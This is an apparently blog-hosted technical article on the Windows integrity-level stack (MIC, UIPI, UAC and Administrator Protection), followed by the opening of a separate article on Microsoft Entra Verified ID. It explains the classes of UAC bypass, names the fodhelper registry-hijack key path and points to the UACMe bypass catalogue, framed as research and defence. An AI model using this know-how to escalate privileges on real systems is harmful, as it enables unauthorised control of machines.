MIC does not implement Biba's Simple Integrity Property at all. There is no NO_READ_DOWN policy in the winnt.h mandatory-label-policy enumeration. The opt-in NO_READ_UP bit MIC exposes points the other way: it stops a lower-IL subject from reading a higher-IL object, which is structurally Bell-LaPadula's Simple Security Property (no read up for confidentiality) repurposed onto an integrity SID rather than a confidentiality label [@blp-wiki][@mandatory-label-ace]. By default, a Low-IL process can read a High-IL file. This is the design choice Forshaw's Reading Your Way Around UAC series turned into a research program in 2017 [@forshaw-reading-uac].

MIC does not implement the Invocation Property either. A Medium-IL process can invoke a High-IL service via the COM Elevation Moniker, via ShellExecuteEx "runas", via any of the auto-elevated binaries, via RPC to Appinfo. The absence of the Invocation Property is exactly what makes UAC operationally usable: a strict reading of Biba would forbid every brokered elevation surface in Windows, and the OS would be unbearable to use. The omission is deliberate, and it is the theoretical reason why every "bypass" of UAC is technically a use of an architectural surface, not a violation of it.

flowchart LR subgraph BIBA ["Biba 1977 -- integrity model"] A["Biba 1977
integrity model"] --> B["Simple Integrity
(no read down)"] A --> C["Star Integrity
(no write up)"] A --> D["Invocation Property
(no invoke up)"] B --> E["MIC: not implemented
(no NO_READ_DOWN policy in winnt.h)"] C --> F["MIC: default NO_WRITE_UP
(on by default)"] D --> G["MIC: not implemented
(COM moniker, runas verb, Appinfo)"] end subgraph BLP ["Bell-LaPadula 1973 -- confidentiality model"] H["Bell-LaPadula 1973
confidentiality model"] --> I["Simple Security
(no read up)"] I --> J["MIC: opt-in NO_READ_UP
(off by default, repurposed onto IL)"] end Strict Biba would forbid every brokered-elevation primitive in Vista. The COM Elevation Moniker, `ShellExecuteEx "runas"`, the entire RPC interface to Appinfo, the `IFileOperation`-class auto-elevated COM objects, the manifest-based elevation request: all of these are explicitly *invocations* by a lower-IL caller of a higher-IL server [@biba-wiki].

Microsoft's architectural decision was that brokered elevation is the operationally usable workaround. A Medium-IL caller cannot invoke a High-IL server directly, but a Medium-IL caller can ask the SYSTEM-trusted Appinfo broker to create a High-IL process whose initial state the broker controls. The broker is the mediation point. The brokered model is structurally weaker than strict Biba, and that weakness is exactly the surface the bypass-research industry has operated in for sixteen years. Every COM-elevation moniker bypass, every auto-elevation registry hijack, every DLL-search-order attack is a refinement of the same observation: brokered elevation lets Medium-IL inputs influence High-IL outputs in ways the broker cannot fully validate.

The access-control versus information-flow gap

The deeper bound is information-flow. Dorothy Denning's May 1976 Communications of the ACM paper A lattice model of secure information flow established the formal framework [@denning-1976]. The underlying limit is fundamental: information-flow enforcement is undecidable in the general case, because verifying that a program never leaks information from class $A$ to class $B$ requires deciding properties of arbitrary programs, which reduces to the halting problem. Denning's lattice model pairs with a conservative compile-time certification that stays decidable precisely because it over-approximates.

MIC enforces access control, not information flow. The distinction is essential. Access control answers "can this subject perform this operation on this object?" decidably, at operation time, by walking the object's ACEs against the token. Information flow asks "does the final state of this system contain any information derived from data the subject was not authorised to read?" That is undecidable.

What this means for UAC: even when MIC perfectly enforces NO_WRITE_UP, a Low-IL process can still influence a High-IL process via shared state the High-IL process reads. Forshaw's January 2026 lazy DOS device directory hijack [@forshaw-adminprot-jan26] is exactly such an attack: it places attacker-controlled state in a location a High-IL process will later read, without ever writing up directly. MIC cannot prevent this; no access-control primitive can. Closing the gap requires information-flow analysis, which is provably undecidable for arbitrary code.

The five concrete limits

The theoretical bounds map onto five concrete limits any practitioner can observe on a default Windows 11 install.

The first limit is that no-write-up does not imply no-influence-up. A Low-IL process cannot write to High-IL objects directly, but it can place state (registry keys, files, environment variables, named objects) that a High-IL process will subsequently read or be influenced by. Every fileless UAC bypass in §7.1 walks through this gap.

The second limit is that NO_READ_UP is opt-in [@mic-doc]. By default, a Low-IL process can read a High-IL file. This is intentional: accessibility tools, antivirus, and diagnostic utilities depend on cross-IL reads. The cost is that any High-IL data placed at a default-policy location is readable by every Medium-IL or lower process on the system.

The third limit is that UIPI covers only the windowing layer. Sockets, named pipes, COM, RPC, shared memory, MIDL-defined RPC interfaces, and every other inter-process channel that does not go through win32k.sys is out of scope [@uipi-wiki]. UIPI is necessary, but it is not sufficient for cross-IL isolation; the full bound requires MIC on the file system, the registry, and every named object the higher-IL process might consume.

The fourth limit is the same-IL same-desktop attack surface. Two Medium-IL processes on the user's Default desktop are not isolated from each other by either MIC or UIPI. They have the same IL (no MIC bound) and they own windows on the same desktop with the same IL (no UIPI bound). Every modern browser sandbox addresses this separately, by combining MIC (the renderer runs at Low IL or Untrusted IL) with AppContainer (capability-based identity isolation) and restricted tokens (CreateRestrictedToken-style SID denial) [@chromium-sandbox][@appcontainer-isolation]. Where MIC alone is insufficient, the stack layers additional primitives, but those primitives are additions to MIC, not replacements for it.

The fifth limit is the auto-elevated-binary surface. As long as a Medium-IL process can cause a High-IL process to come into existence executing user-controllable inputs (registry handlers, DLL search-order resolution, COM moniker activation, command-line arguments), the bypass-research industry has architectural space to operate. The fix would be to apply the Invocation Property strictly, which would break elevation.

Why MIC has to be a separate evaluator

The Harrison-Ruzzo-Ullman 1976 result is the theoretical reason MIC could not be implemented as discretionary ACEs [@hru-1976]. HRU prove that the safety question (given an initial access matrix, will any future sequence of operations cause subject $s$ to acquire permission $p$ on object $o$?) is undecidable for the general access-matrix model. That undecidability is what makes mandatory policy necessary as a separate evaluator: if integrity were encoded as discretionary ACEs, the safety of an object's integrity label would inherit HRU undecidability through every principal with rights over the ACE.

By making MIC a separate evaluator with non-discretionary semantics, Windows answers the integrity-safety question in O(1) per access check: compare two SIDs, consult three policy bits, decide. The decidability comes from the separation. MIC is bounded because it is structurally simpler.

None of the bypass classes in §7 violate any of these limits. They all operate within them. The registry-hijack class places Low-IL state where a High-IL reader will consume it (limit #1). The DLL-search-order class abuses the auto-elevated-binary surface (limit #5). The COM-behaviour-abuse class operates on the absent Invocation Property. Microsoft's response, repeated for sixteen years, was to acknowledge these as architectural realities of the design rather than as bugs to fix. The bypass-research literature is the empirical map of the access-control versus information-flow gap that no mainstream OS has closed.

Did Microsoft ever try to actually move the boundary? What does it look like when a security feature finally becomes a security boundary?

9. The Adminless Successor and the Open Problems

In November 2024, Microsoft did something it had not done in seventeen years. It moved the security-boundary line. Administrator Protection, announced as a Windows 11 platform feature, became the first generation in the integrity-level lineage that Microsoft classifies as a security boundary [@admin-protection][@msft-devblog-adminprot]. The reclassification is structurally substantial. It is not Microsoft renaming UAC; it is Microsoft adding the architectural primitives a boundary classification requires.

What the split-token model shared, and what Administrator Protection separates

The four shared properties between the filtered token and the linked token were the structural reason UAC could not be a security boundary. They are listed verbatim in Forshaw's May 2017 Reading Your Way Around UAC framing [@forshaw-reading-uac]: same user SID, same %USERPROFILE%, same HKCU hive, same logon-session LUID. Administrator Protection attacks all four.

The per-user separate identity Windows 11 Administrator Protection provisions at first elevation. Has a different SID, `%USERPROFILE%`, `HKCU` hive, and LUID from the calling user, defeating the registry-hijack class of UAC bypasses by structurally separating elevated-process state from the caller's state.

Property	2007 Split-Token (UAC)	2024 Administrator Protection
User SID	Same as caller	Different (per-user System Managed Administrator Account, SMAA)
`%USERPROFILE%`	Same as caller	Different: `C:\Users\ADMIN_<random>\`
`HKCU` registry hive	Same hive as caller	Different hive (per-SMAA)
Logon session LUID	Same session as caller	Fresh logon session per elevation
Authentication	Consent click only	Windows Hello integrated authentication
Classification	Security feature, not boundary	Security boundary

SMAA expands as "System Managed Administrator Account" per the May 19, 2025 Microsoft Windows Developer Blog explainer Enhance your application security with Administrator protection [@msft-devblog-adminprot]. Earlier Microsoft Learn documentation from 2024 used the working name "Adminless" without the SMAA acronym. The corpus's Adminless / Administrator Protection article (#52) covers the SMAA lifecycle and the Insider-Preview timeline in more depth than this article does.

The concrete operational consequence of the SMAA identity change is structural defeat of the entire registry-hijack class. When an attacker writes the canonical fodhelper bypass key to HKCU\Software\Classes\ms-settings\shell\open\command, the attacker writes to the caller's HKCU hive. When fodhelper.exe is then elevated under Administrator Protection, the elevated process runs under the SMAA identity, with the SMAA's own HKCU hive, which does not contain the attacker's key. The auto-elevated binary resolves the ms-settings association via the SMAA's HKCU, falls through to HKLM, and gets the legitimate handler. The attacker's bypass is structurally defeated by the identity change, not by a per-binary fix [@admin-protection][@forshaw-adminprot-jan26].

The 2025 timeline

Administrator Protection's rollout has been incremental. Microsoft released it as an opt-in toggle in early 2024 Insider Preview builds, then shipped a generally-available implementation in optional update KB5067036 on October 28, 2025 [@forshaw-adminprot-jan26]. The Microsoft Learn Administrator protection page acknowledges a temporary revert on December 1, 2025 "while an application compatibility issue is dealt with" [@admin-protection][@forshaw-adminprot-jan26]. The expected re-enablement is in 2026.

Forshaw's January 26, 2026 Project Zero post Bypassing Windows Administrator Protection documents the application-compatibility revert with verbatim precision. He notes that "the issue is unlikely to be related to anything described in this blog post," meaning that the December 2025 revert was a third-party application compatibility regression rather than a security issue with the feature itself [@forshaw-adminprot-jan26]. The revert is operational, not architectural.

The 2026 retrospective: nine bypasses, five via UI Access

Forshaw's January and February 2026 Project Zero pair is the canonical modern retrospective on Administrator Protection's architectural maturity. The January post documents nine separate Administrator Protection bypasses Forshaw reported to Microsoft during the Insider Preview cycle, all of which were fixed before general availability [@forshaw-adminprot-jan26]. The post details one in depth (the lazy DOS device directory hijack) and summarises the rest.

If the weaknesses in UAC can be mitigated then it can be made a secure boundary. -- James Forshaw, *Bypassing Windows Administrator Protection*, Project Zero, January 26, 2026

The February 2026 follow-on post, Bypassing Administrator Protection by Abusing UI Access, is the more architecturally significant of the pair. It documents that five of the nine pre-GA Administrator Protection bypasses operated entirely through the uiAccess=true exemption, the long-standing UIPI carve-out for accessibility software inherited unchanged from Vista 2007 [@forshaw-adminprot-feb26].

The reading is structural. Administrator Protection successfully closes the bypass surface that the split-token model's shared identity created (limit #1 through limit #4 in §8). It does not close the bypass surface created by the UI Access carve-out, because UI Access is a deliberate exemption from UIPI. Closing UI Access would break screen readers, on-screen keyboards, remote-control tools, and every accessibility utility that depends on cross-IL window-message access. The exemption is necessary; the residual attack surface is the cost of accessibility.

The three gating conditions for uiAccess=true (manifest assertion, valid Authenticode signature, admin-only install location) are documented in the Security Considerations for Assistive Technologies Microsoft Learn page [@uia-security]. Forshaw's February 2026 post enumerates them verbatim and describes the RAiLaunchAdminProcess Appinfo RPC entry point the UI-Access bypasses operate through [@forshaw-adminprot-feb26]. The trade press picked up the story immediately: The Register covered Forshaw's January 2026 post under the headline "Google researcher sits on UAC bypass for ages, only for it to become valid with new security feature" on January 28, 2026 [@register-2026].

The downstream legacy

MIC and UIPI outlived UAC. The integrity-SID primitive is the connective tissue of every later sandbox model on Windows.

flowchart TD A["Integrity-SID primitive
(MIC + UIPI, Vista 2006/2007)"] --> B["AppContainer
(Windows 8, 2012)"] A --> C["IE Protected Mode
(IE7, Vista 2006)"] A --> D["Edge / Chrome / Firefox sandbox tiers
(2008-present)"] A --> E["Protected Process Light
(Windows 8.1, 2013)"] A --> F["Administrator Protection / SMAA
(Windows 11, 2024)"] A --> G["RunAsPPL for LSASS
(Windows 8.1, 2013)"] A --> H["Office Protected View
(Office 2010+)"]

AppContainer (Windows 8, 2012) layers package SIDs above the integrity SID and rides the same SeAccessCheck infrastructure [@appcontainer-isolation]. IE Protected Mode (Windows Vista IE7, 2006) was the first non-UAC consumer of Low IL, running browser-rendered content as a Low-IL process before the user's Medium-IL interactive shell. Modern browser sandbox tiers (Chrome, Edge, Firefox content processes) use Low-IL or Untrusted-IL sandbox processes, layered with AppContainer and restricted tokens [@chromium-sandbox]. Protected Process Light (Windows 8.1, 2013) is a signature-based generalisation of the integrity-SID concept that PPL-protects LSASS against OpenProcess by lower-IL callers. Administrator Protection itself uses the integrity-SID primitive: SMAA processes run at High IL while the calling Medium-IL admin shell stays Medium [@admin-protection].

The twenty-year experiment was a success. The integrity-level stack did exactly what it was designed to do: bound integrity, not authority. The consent prompt was honestly never the security boundary. Microsoft's November 2024 reclassification finally promotes a feature to a boundary by adding the architectural support the boundary classification requires (separate identity, separate profile, separate hive, separate LUID, Windows Hello-mediated transition). The bypass-research literature is the empirical proof that the 2007 disclaimer was honest, and the proof that the architecture worked exactly as architected.

Key idea: MIC and UIPI outlived UAC. The integrity-SID primitive is the connective tissue of AppContainer, every modern browser sandbox, Protected Mode, Protected Process Light, and the Administrator Protection successor. The yellow dialog is the smallest, most replaceable piece of the system.

On December 1, 2025, Microsoft temporarily reverted Administrator Protection in KB5067036 pending an application-compatibility fix [@admin-protection][@forshaw-adminprot-jan26]. Forshaw's exact framing matters: "the issue is unlikely to be related to anything described in this blog post." The revert was *not* a security regression; it was a third-party application-compatibility issue, with re-enablement expected in 2026. As of May 2026, Administrator Protection can be enabled manually on Windows 11 24H2 and later but is not the default on consumer or enterprise SKUs pending re-enablement [@admin-protection].

10. Inspecting the Stack on a Real Box

Every primitive in this article is observable on the Windows install you are reading on. Here are the five commands and the two tools that will let you walk the stack yourself.

Inspecting integrity levels

whoami /groups | findstr Mandatory prints the mandatory label of the current process token. From an unelevated PowerShell on an administrator account, it will read Mandatory Label\Medium Mandatory Level. From an elevated PowerShell, it will read Mandatory Label\High Mandatory Level. From a renderer-process command inside a Chromium-based browser, it would read Mandatory Label\Low Mandatory Level or Untrusted Mandatory Level, depending on the sandbox tier.

whoami /all is the longer view. It prints every group SID, every privilege, and the full mandatory label.Process Explorer (and System Informer) will show you the same data graphically, but whoami is the canonical first-party command for getting at the same kernel information from the shell. Run it twice -- once from an unelevated PowerShell, once from an elevated PowerShell on the same admin account -- and diff the outputs to see what the elevation actually changed. That is the empirical re-creation of §1's hook.

Sysinternals' Process Explorer has an Integrity column you can add via View / Select Columns / Process Image. Once enabled, it shows the IL of every running process at a glance. System Informer (the open-source Process Explorer successor) supports the same column plus richer SACL inspection. The accesschk -e -l <object> Sysinternals command prints the mandatory label of a file, registry key, or other securable object: accesschk -e -l C:\Windows\System32\drivers\ reveals the System-IL label that protects the driver directory.

The PowerShell-native equivalent of `whoami /all` that programs can consume is:

[System.Security.Principal.WindowsIdentity]::GetCurrent() |
  Select-Object -ExpandProperty Groups |
  ForEach-Object { $_.Translate([System.Security.Principal.NTAccount]) }

This produces the same SID-to-account-name resolution whoami /groups does, and is useful inside automation that needs to test deny-only group membership programmatically.

Inspecting UIPI

UIPI is harder to observe directly because the OS does not log dropped messages. The practical demonstration is to run Spy++ (the Visual Studio windowing inspector) from a Medium-IL process and attempt to subclass a window owned by an elevated High-IL process. The subclass call silently fails. SendMessage returns 0 with GetLastError reading ERROR_ACCESS_DENIED. The ChangeWindowMessageFilterEx documentation page is the Microsoft Learn entry point for understanding the per-window, per-message exemption surface [@changewindowfilter].

Enumerating the auto-elevation list

sigcheck -m C:\Windows\System32\*.exe | findstr /i autoelevate walks every executable in System32 and prints the manifest of each. The findstr filter narrows to lines containing autoElevate, surfacing the binaries that assert the manifest flag. On a Windows 11 25H2 install, the resulting list runs to thirty to forty binaries. Remember that the manifest-asserting list is not the same as Appinfo's internal operational allowlist; the operational subset is what UACMe enumerates [@uacme].

Watching Appinfo in action

Procmon (Sysinternals Process Monitor) filtered on consent.exe shows every elevation event: the registry reads against the manifest, the SACL reads on the binary, the token-information queries against the caller's filtered token. The Windows Event Viewer's Applications and Services Logs / Microsoft / Windows / User Account Control channel logs elevation events at the OS level. The combination of Procmon (mechanism) and the Event Viewer (audit trail) is the standard observability surface for elevation operations.

A safe lab for the bypass classes

UACMe is the community catalogue of 81 documented UAC bypass methods, each with author, technique, target binary, and Windows-version applicability annotations [@uacme]. For inspection of the integrity-level state of running processes from an analyst's workstation, James Forshaw's sandbox-attacksurface-analysis-tools repository (the NtObjectManager, TokenViewer, and NtCoreLib PowerShell modules) is the standard research toolchain [@forshaw-tools]. The UACMe reference implementations (akagi32.exe, akagi64.exe) are flagged by Microsoft Defender as HackTool:Win32/Welevate, the detection name Davidson noted as early as 2009 [@davidson-2009]. This is research tooling, not endpoint operations: run UACMe only on a snapshot VM with Defender exclusions documented, and treat the output as an empirical confirmation of the bypass-research record rather than as an offensive primitive.

Note: The minimum five commands a reader can run on their own Windows box to verify everything in this article: 1. whoami /all (run twice: once unelevated, once elevated; diff the outputs) 2. whoami /groups | findstr Mandatory (inspect the IL of the current token) 3. sigcheck -m C:\Windows\System32\eventvwr.exe (read the autoElevate manifest) 4. tasklist /v /fi "imagename eq svchost.exe" | findstr Appinfo (confirm the Appinfo service host) 5. Process Explorer with the Integrity column enabled, sorted by IL (the entire stack at a glance) The whole tour takes ten minutes. By the end you will have seen the split-token model, the integrity-level lattice, the auto-elevation allowlist, the Appinfo broker, and the Medium-vs-High distribution of your interactive desktop, with your own eyes.

11. Five Misconceptions That Will Not Die

Five UAC misconceptions come up so often in practitioner discussions that any complete treatment owes the reader explicit corrections. Two practical questions round out the FAQ.

No, and Microsoft's own documentation has said so since February 2007. The canonical "Neither UAC elevations nor Protected Mode IE define new Windows security boundaries" sentence appears in the *PsExec, User Account Control and Security Boundaries* TechNet Blogs post by Mark Russinovich, dated February 12, 2007 -- see §7.4 for the full quote and the citation-chain disambiguation against the *Inside Windows Vista User Account Control* TechNet Magazine architectural article [@russinovich-blog-2007][@russinovich-tnm-2007]. The boundary line was finally moved in November 2024 with Administrator Protection, which Microsoft does classify as a security boundary [@admin-protection][@forshaw-adminprot-jan26]. The original split-token UAC was never a boundary, by design, and the bypass-research record from 2009 to 2024 is the empirical confirmation that the disclaimer was honest. No. The Secure Desktop is on the `Winlogon` desktop within `WinSta0`, *within* the user's interactive session (Session 1, 2, ...) -- §6.1 walks the full Object-Manager hierarchy and contrasts it with the separate Vista Session 0 Isolation feature that moved Windows services into a non-interactive Session 0 [@russinovich-tnm-2007]. The two features ship together in Vista and are constantly confused, but they live at different layers of the Object Manager hierarchy and address different threats. No. The manifest entry is necessary but not sufficient. Appinfo enforces three additional gates: the binary must carry a valid Microsoft Authenticode signature, the binary must reside under a trusted system directory (`%SystemRoot%\System32` or `%SystemRoot%\SysWOW64`), and the binary's name must appear on an internal allowlist enforced in code in `appinfo.dll`, not in any user-visible policy file [@davidson-2009][@app-manifests]. Copying `autoElevate=true` into your own binary's manifest does nothing on its own. The community-standard enumeration technique is `sigcheck -m C:\Windows\System32\*.exe | findstr /i autoelevate`, but that enumerates the manifest-asserting set, not the operational allowlist. No -- UIPI blocks a specific dangerous subset (window-state mutators, hooks, input injection, journal record / playback); mouse messages, most paint messages, and read-only window queries pass. The complete row-by-row enumeration of blocked vs allowed vs degraded-but-passes message classes is in the §4.2 table. The "blocks all `WM_*`" misconception is one of the most common errors in Windows-security literature [@uipi-wiki][@russinovich-blog-2007]. No. `ShellExecuteEx` with the `"runas"` verb is whole-process elevation: Appinfo creates a new process under the caller's linked full token, and the new process runs at High IL for its entire lifetime [@shellexecuteexa]. The COM Elevation Moniker is per-object elevation: a Medium-IL caller instantiates a single COM object in a new elevated `dllhost.exe` exposing only that one CLSID's methods at High IL [@com-elevation-moniker]. The caller stays Medium; only the COM object's host process is elevated. The bypass-research literature attacks the second surface far more than the first, because per-object elevation exposes a narrower, more abusable *behavioural* surface (the methods of one CLSID), while whole-process elevation requires a path-class bypass like DLL-search-order to weaponise. Partially. The registry-hijack class (the eventvwr / fodhelper / sdclt / ComputerDefaults family from 2016-2017) is structurally defeated by the SMAA identity change: the attacker writes to the caller's HKCU hive, but the elevated process runs under the SMAA's different HKCU hive and never consults the attacker's key [@admin-protection]. The DLL-search-order class is partially mitigated by the SMAA's different `%USERPROFILE%` and different working directory. The UI Access class is *not* mitigated: it is the long-standing carve-out for accessibility software, inherited unchanged from Vista 2007, and Forshaw's February 2026 Project Zero post documents that this carve-out carried five of nine pre-GA Administrator Protection bypasses [@forshaw-adminprot-feb26]. UACMe remains the canonical operational catalogue for the bypass classes that survive Administrator Protection. No. Setting `EnableLUA=0` in `HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System` reverts the OS to the pre-Vista posture: no split-token model, every admin-account process running High-IL by default, every interactive shell holding the full admin SID set and the complete privilege list. The integrity-level *primitive* (MIC) remains in the kernel; the *policy* that makes it operationally useful (the default-Medium-IL filtered token for interactive admins) is disabled. Browser sandbox tiers still function, because they construct restricted Low-IL tokens explicitly. The admin's daily shell does not benefit, and a malware drop in any process under the admin's interactive session immediately holds High IL [@uac-how-it-works]. This is structurally the XP situation. Leaving `EnableLUA=1` (the default) is correct on every modern Windows install.

12. The Plumbing Outlived the Yellow Dialog

Return to the two whoami outputs from §1. The user is the same. The session is the same. The clock has barely moved. Read them again, and now read what each line means.

The administrator group SID was present in both tokens, marked deny-only on the filtered token and enabled on the elevated token. The integrity level changed from Medium (S-1-16-8192) to High (S-1-16-12288). The privilege set expanded from the small user-mode subset to the full administrator set. The bits that moved were the kernel-level token-assignment bits in the new process Appinfo created via CreateProcessAsUser, using the dormant linked token that LSA had constructed thirty minutes earlier at logon. The yellow dialog was the consent surface on top of a token-swap primitive that existed before the dialog rendered and that can move bits without the dialog (via auto-elevation).

Four primitives carried the work. Mandatory Integrity Control added an axis to the access check that runs before the DACL and short-circuits on a Low-to-High write attempt, regardless of what the DACL says. User Interface Privilege Isolation closed the cross-IL variant of the shatter-attack class that Paget published in 2002, by dropping the dangerous subset of window messages and hook calls from lower-IL senders to higher-IL receivers. The split-token model gave every administrator a Medium-IL filtered token at logon and held the full token dormant. The Appinfo SYSTEM-trusted broker mediated the token swap when consent or auto-elevation called for it.

The bypass-research industry of 2009 to 2024 was the empirical confirmation of the architect's 2007 disclaimer. Davidson's December 2009 essay opened the auto-elevation surface; Nelson's 2016-2017 series productised the registry-hijack class; hfiref0x's UACMe catalogued 81 methods and counting; Forshaw's 2017 Reading Your Way Around UAC series named the read-side surface; the cumulative record was a sixteen-year demonstration that UAC was not a security boundary, exactly as Russinovich had publicly stated in February 2007. Microsoft never classified any of these as security vulnerabilities, because the architectural commitment from week one had been that they would not be [@russinovich-blog-2007][@msrc-criteria].

The November 2024 Administrator Protection reclassification is the line finally moving. The split-token model's four shared properties between filtered and linked tokens (same SID, same %USERPROFILE%, same HKCU, same LUID) are replaced by an SMAA identity that differs on all four dimensions, plus Windows Hello-mediated authentication for every elevation [@admin-protection][@msft-devblog-adminprot]. The registry-hijack class is structurally defeated; the residual surface is the UI Access carve-out inherited unchanged from Vista 2007, which Forshaw's February 2026 Project Zero post documents as the source of five of nine pre-GA bypasses [@forshaw-adminprot-feb26].

The yellow dialog is the only piece of UAC most users will ever see. It is also the one piece the OS could replace tomorrow without changing what UAC is. MIC and UIPI outlived UAC. AppContainer, every modern browser sandbox, IE Protected Mode, Office Protected View, Protected Process Light, and Administrator Protection itself all ride on the integrity-SID and WinSta0 primitives that shipped on January 30, 2007 [@vista-press-release][@appcontainer-isolation][@chromium-sandbox]. The quiet plumbing did the work.

Next time you click "Yes" on the consent prompt, the bits that move are the same bits that move when Edge spawns a renderer at Low IL, when Defender protects LSASS as PPL, and when a SMAA process shadows your administrator identity on a Windows 11 25H2 install with Administrator Protection enabled. The dialog is the smallest part of the system. Twenty years of empirical research proved Russinovich right: UAC was never the boundary. The integrity-level stack was the quiet plumbing, and Administrator Protection is the later boundary-classified successor [@russinovich-blog-2007][@admin-protection].

<StudyGuide slug="integrity-level-stack-mic-uipi-uac" keyTerms={[ { term: "Mandatory Integrity Control (MIC)", definition: "An access-check evaluator that compares the integrity level of a subject token to the integrity level of a target object before consulting the object's DACL. Denials short-circuit the access check; integrity beats identity." }, { term: "Integrity Level (IL)", definition: "A well-known SID under S-1-16-X carried on every token and securable object. Seven values: Untrusted, Low, Medium, Medium Plus, High, System, Protected Process." }, { term: "User Interface Privilege Isolation (UIPI)", definition: "The windowing-layer analog of MIC. Blocks dangerous window messages, hooks, and input injection from lower-IL processes targeting higher-IL windows on the same desktop." }, { term: "Split-token model", definition: "Admin Approval Mode: an administrator's logon produces a Medium-IL filtered token plus a dormant High-IL linked token. The filtered token runs the interactive shell." }, { term: "Secure Desktop", definition: "A separate desktop object (Winlogon) within WinSta0 in the user's interactive session, on which consent.exe renders the UAC prompt. Not Session 0." }, { term: "Application Information service (Appinfo)", definition: "The SYSTEM-trusted Windows service that mediates the filtered-to-linked token swap at elevation time. Exposes RAiLaunchAdminProcess." }, { term: "Auto-elevation allowlist", definition: "The internal Appinfo allowlist of Microsoft-signed binaries in trusted directories whose manifests assert autoElevate=true. Four gates: manifest, signature, path, allowlist entry." }, { term: "COM Elevation Moniker", definition: "Per-object elevation via Elevation:Administrator!new:{CLSID}. Spins up a single CLSID in an isolated High-IL dllhost.exe while the caller stays Medium." }, { term: "System Managed Administrator Account (SMAA)", definition: "The per-user separate identity Administrator Protection provisions at first elevation. Different SID, profile, HKCU, LUID from the calling user." }, { term: "Biba Star Integrity Property", definition: "No write up: a subject at integrity level Is cannot write an object at integrity level Io > Is. MIC implements this as the default NO_WRITE_UP policy." } ]} questions={[ { q: "Why is MIC a separate evaluator rather than another ACE in the DACL?", a: "Because DACLs are discretionary by definition; an object owner can rewrite the DACL. MIC's mandatory semantics require an evaluator that runs before the DACL and cannot be overridden by it. The HRU 1976 undecidability of the access-matrix safety question is the formal reason mandatory policy cannot be encoded as discretionary ACEs and remain decidable." }, { q: "Why doesn't the consent prompt elevate?", a: "Because the elevated token was constructed at logon by LSA, not at consent time by the prompt. The prompt asks the user whether the OS may use the already-existing linked full token to launch a new process. The token swap is performed by Appinfo, not by consent.exe; the prompt is the consent surface on top of a token-swap primitive." }, { q: "Why does UIPI block WM_SETTEXT but not WM_PAINT?", a: "Because WM_SETTEXT mutates the receiving window's state (the message replaces the window's text), and an attacker who can mutate a higher-IL window's state has gained influence over the higher-IL process. WM_PAINT only asks the window to redraw itself; it carries no attacker-controlled mutation, so allowing it from lower-IL senders is safe." }, { q: "Which Biba rules does MIC actually implement?", a: "Just one. MIC implements the Star Integrity Property (NO_WRITE_UP) as the default policy on every object that does not specify otherwise. MIC does not implement Biba's Simple Integrity Property (no read down) at all -- there is no NO_READ_DOWN policy in winnt.h. The opt-in NO_READ_UP bit MIC exposes is structurally a Bell-LaPadula simple-security analog applied to integrity SIDs, not a Biba rule. MIC does not implement the Invocation Property either; brokered elevation (COM Elevation Moniker, ShellExecuteEx 'runas', Appinfo) is the operationally usable workaround." }, { q: "What changed in November 2024 that turned UAC's elevation transition into a security boundary?", a: "Administrator Protection replaced the split-token model's four shared properties (same SID, same %USERPROFILE%, same HKCU, same LUID) with a System Managed Administrator Account that differs on all four dimensions, and required Windows Hello integrated authentication for every elevation. The structural identity separation defeats the entire registry-hijack bypass class. The residual surface is the UI Access carve-out inherited unchanged from Vista 2007." } ]} />

From ION to did:web: The Seven-Year Compromise Behind Microsoft Entra Verified ID

noreply@paragmali.com (Parag Mali) — Sat, 30 May 2026 00:00:00 GMT

**Microsoft built a Bitcoin-anchored decentralized identity network, ran it for three years, and quietly turned it off.** What ships under the name *Entra Verified ID* in May 2026 is `did:web` plus JWT-VC plus the Microsoft Authenticator wallet -- an enterprise identity product that reuses DNS and the X.509 certificate-authority chain as its trust root. The 2019 promises of permissionless anchoring, JSON-LD elegance, and BBS-style selective disclosure did not survive contact with paying customers. The EU's EUDI Wallet deadline of 24 December 2026 may force a second pivot. This article walks the seven-year compromise.

1. One Trust System

In May 2019, the Microsoft Identity Division opened a corporate blog post with this sentence:

"We believe every person needs a decentralized, digital identity they own and control, backed by self-owned identifiers that enable secure, privacy preserving interactions." [@simons-buchner-2019]

In December 2023, a one-line entry in the Microsoft Entra Verified ID changelog read:

"The option of selecting did:ion as a trust system is removed. The only trust system available is did:web." [@ms-learn-whatsnew]

Both sentences are Microsoft. Both are about identity. Both are about decentralization. Both are official. They are six years apart and they contradict each other.

This article is the story of what happened in between, and what it tells us about the gap between any decentralized-identity vision and any decentralized-identity product that actually ships. It is not a Microsoft product tour, and it is not a polemic. It is an analysis of which trade-offs the seven-year journey made and why each trade-off was reasonable at the time it was made.

By the end you will know three things: what was promised in 2019, what is actually shipping in May 2026, and what may yet change under the EU's 24 December 2026 wallet deadline [@eidas-2]. Each of those three answers turns on a single architectural decision that the rest of the story will keep coming back to: where the trust root sits.

To see how Microsoft got from one sentence to the other, we have to start two decades earlier, before there was a "decentralized identity" movement to join.

2. Cameron's Long Shadow: Microsoft's 20-Year Identity Detour

Microsoft did not arrive at decentralized identity in 2019. It arrived for the second time.

The first arrival was in May 2005, when Kim Cameron, then identity architect at Microsoft, published The Laws of Identity on his personal weblog [@cameron-laws-2005]. The seven laws read like an early draft of every self-sovereign identity manifesto that would follow: User Control and Consent; Minimal Disclosure for a Constrained Use; Justifiable Parties; Directed Identity; Pluralism of Operators and Technologies; Human Integration; Consistent Experience Across Contexts.

A model in which individuals (or organizations) hold their own identifiers and credentials and present them directly to relying parties, without an issuer being online to mediate each transaction. Christopher Allen's 2016 essay codified ten principles for the model, drawn explicitly from Cameron's seven Laws [@allen-ssi-2016]. Technical identity systems MUST only reveal information identifying a user with the user's consent. -- Kim Cameron, *The Laws of Identity*, First Law [@cameron-laws-2005]

Cameron's first product expression was CardSpace, Microsoft's user-controlled "information card" selector that shipped with Windows Vista. It died in February 2011 [@cardspace-wiki]. The cause of death was not cryptographic. CardSpace was Windows-only at a moment the web was going mobile. It sat on top of WS-* protocols at a moment the industry was migrating to JSON over HTTP. And it asked relying parties to integrate a new identity layer in the same year Sign-in-with-Facebook and Sign-in-with-Google were eating the relying-party adoption budget.

Two ideas survived the wreckage: the user as the holder of their own credentials, and Cameron's seven Laws as a recurring design checklist.

U-Prove, Microsoft's research project on unlinkable credentials acquired from Credentica in March 2008 [@credentica-2008-archive], survived CardSpace's death as a Microsoft Research project on the U-Prove anonymous-credential technology [@msr-uprove] but never shipped as a product. Its cryptographic ideas reappear, two decades later, in the BBS signature work that EUDI Wallet implementers are now adopting.

